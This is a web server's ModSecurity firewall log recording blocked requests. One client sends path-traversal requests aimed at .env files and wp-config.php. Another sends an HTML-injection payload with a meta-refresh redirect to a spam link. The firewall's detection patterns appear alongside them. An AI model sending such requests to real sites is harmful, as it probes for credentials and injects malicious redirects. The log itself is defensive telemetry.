[Tue May 12 05:31:03.190096 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe9vaAnTZtx1_H_wy3oAAAAUk"]
[Tue May 12 05:31:03.231457 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe9_aAnTZtx1_H_wy3oQAAAUk"]
[Tue May 12 05:31:03.231532 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe9_aAnTZtx1_H_wy3oQAAAUk"]
[Tue May 12 05:31:03.231698 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe9_aAnTZtx1_H_wy3oQAAAUk"]
[Tue May 12 05:31:04.035757 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe9_aAnTZtx1_H_wy3oQAAAUk"]
[Tue May 12 05:31:04.075958 2026] [core:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] AH10244: invalid URI path (/uploads../../../.env)
[Tue May 12 05:31:04.965257 2026] [core:error] [pid 1844863:tid 1844892] [client 45.148.10.247:63156] AH10244: invalid URI path (/uploads../../../../.env)
[Tue May 12 05:31:05.848900 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe-QgpmE1yW0glLdguzAAAANE"]
[Tue May 12 05:31:05.848993 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe-QgpmE1yW0glLdguzAAAANE"]
[Tue May 12 05:31:05.849842 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe-QgpmE1yW0glLdguzAAAANE"]
[Tue May 12 05:31:06.351322 2026] [security2:error] [pid 1825179:tid 1825201] [client 194.233.64.127:64987] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9sn>rlu.ru</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-tr1yOh9TvizezigRwAAAEM"]
[Tue May 12 05:31:06.352719 2026] [security2:error] [pid 1825179:tid 1825201] [client 194.233.64.127:64987] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=http://RLU.Ru/5e9Sn>RLU.Ru</a><meta http-equiv=refresh content=0;url=http://RLU.Ru/5e9Sn /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=http://RLU.Ru/5e9Sn>RLU.Ru</a><meta http-equiv=refresh content=0;url=http://RLU.Ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-tr1yOh9TvizezigRwAAAEM"]
[Tue May 12 05:31:06.352862 2026] [security2:error] [pid 1825179:tid 1825201] [client 194.233.64.127:64987] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://RLU.Ru/5e9Sn /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=http://RLU.Ru/5e9Sn>RLU.Ru</a><meta http-equiv=refresh content=0;url=http://RLU.Ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-tr1yOh9TvizezigRwAAAEM"]
[Tue May 12 05:31:06.353845 2026] [security2:error] [pid 1825179:tid 1825201] [client 194.233.64.127:64987] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=http://RLU.Ru/5e9Sn>RLU.Ru</a><meta http-equiv=refresh content=0;url=http://RLU.Ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-tr1yOh9TvizezigRwAAAEM"]
[Tue May 12 05:31:06.357527 2026] [security2:error] [pid 1825179:tid 1825201] [client 194.233.64.127:64987] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=http://RLU.Ru/5e9Sn>RLU.Ru</a><meta http-equiv=refresh content=0;url=http://RLU.Ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-tr1yOh9TvizezigRwAAAEM"]
[Tue May 12 05:31:06.357863 2026] [security2:error] [pid 1825179:tid 1825201] [client 194.233.64.127:64987] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-tr1yOh9TvizezigRwAAAEM"]
[Tue May 12 05:31:06.358143 2026] [security2:error] [pid 1825179:tid 1825201] [client 194.233.64.127:64987] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-tr1yOh9TvizezigRwAAAEM"]
[Tue May 12 05:31:06.656697 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe-QgpmE1yW0glLdguzAAAANE"]
[Tue May 12 05:31:06.694191 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe-ggpmE1yW0glLdguzQAAANE"]
[Tue May 12 05:31:06.694264 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe-ggpmE1yW0glLdguzQAAANE"]
[Tue May 12 05:31:06.694428 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe-ggpmE1yW0glLdguzQAAANE"]
[Tue May 12 05:31:07.160621 2026] [security2:error] [pid 1842385:tid 1842391] [client 194.233.64.127:65004] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5e9sn>rlu.ru</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5e9sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-xs7kySIUZ3ORnImLAAAAQE"]
[Tue May 12 05:31:07.160977 2026] [security2:error] [pid 1842385:tid 1842391] [client 194.233.64.127:65004] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=http://RLU.Ru/5e9Sn>RLU.Ru</a><meta http-equiv=refresh content=0;url=http://RLU.Ru/5e9Sn /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=http://RLU.Ru/5e9Sn>RLU.Ru</a><meta http-equiv=refresh content=0;url=http://RLU.Ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-xs7kySIUZ3ORnImLAAAAQE"]
[Tue May 12 05:31:07.161106 2026] [security2:error] [pid 1842385:tid 1842391] [client 194.233.64.127:65004] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://RLU.Ru/5e9Sn /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=http://RLU.Ru/5e9Sn>RLU.Ru</a><meta http-equiv=refresh content=0;url=http://RLU.Ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-xs7kySIUZ3ORnImLAAAAQE"]
[Tue May 12 05:31:07.161204 2026] [security2:error] [pid 1842385:tid 1842391] [client 194.233.64.127:65004] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=http://RLU.Ru/5e9Sn>RLU.Ru</a><meta http-equiv=refresh content=0;url=http://RLU.Ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-xs7kySIUZ3ORnImLAAAAQE"]
[Tue May 12 05:31:07.161361 2026] [security2:error] [pid 1842385:tid 1842391] [client 194.233.64.127:65004] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=http://RLU.Ru/5e9Sn>RLU.Ru</a><meta http-equiv=refresh content=0;url=http://RLU.Ru/5e9Sn />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-xs7kySIUZ3ORnImLAAAAQE"]
[Tue May 12 05:31:07.161645 2026] [security2:error] [pid 1842385:tid 1842391] [client 194.233.64.127:65004] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-xs7kySIUZ3ORnImLAAAAQE"]
[Tue May 12 05:31:07.161913 2026] [security2:error] [pid 1842385:tid 1842391] [client 194.233.64.127:65004] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKe-xs7kySIUZ3ORnImLAAAAQE"]
[Tue May 12 05:31:07.495921 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe-ggpmE1yW0glLdguzQAAANE"]
[Tue May 12 05:31:07.534227 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:63168] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag 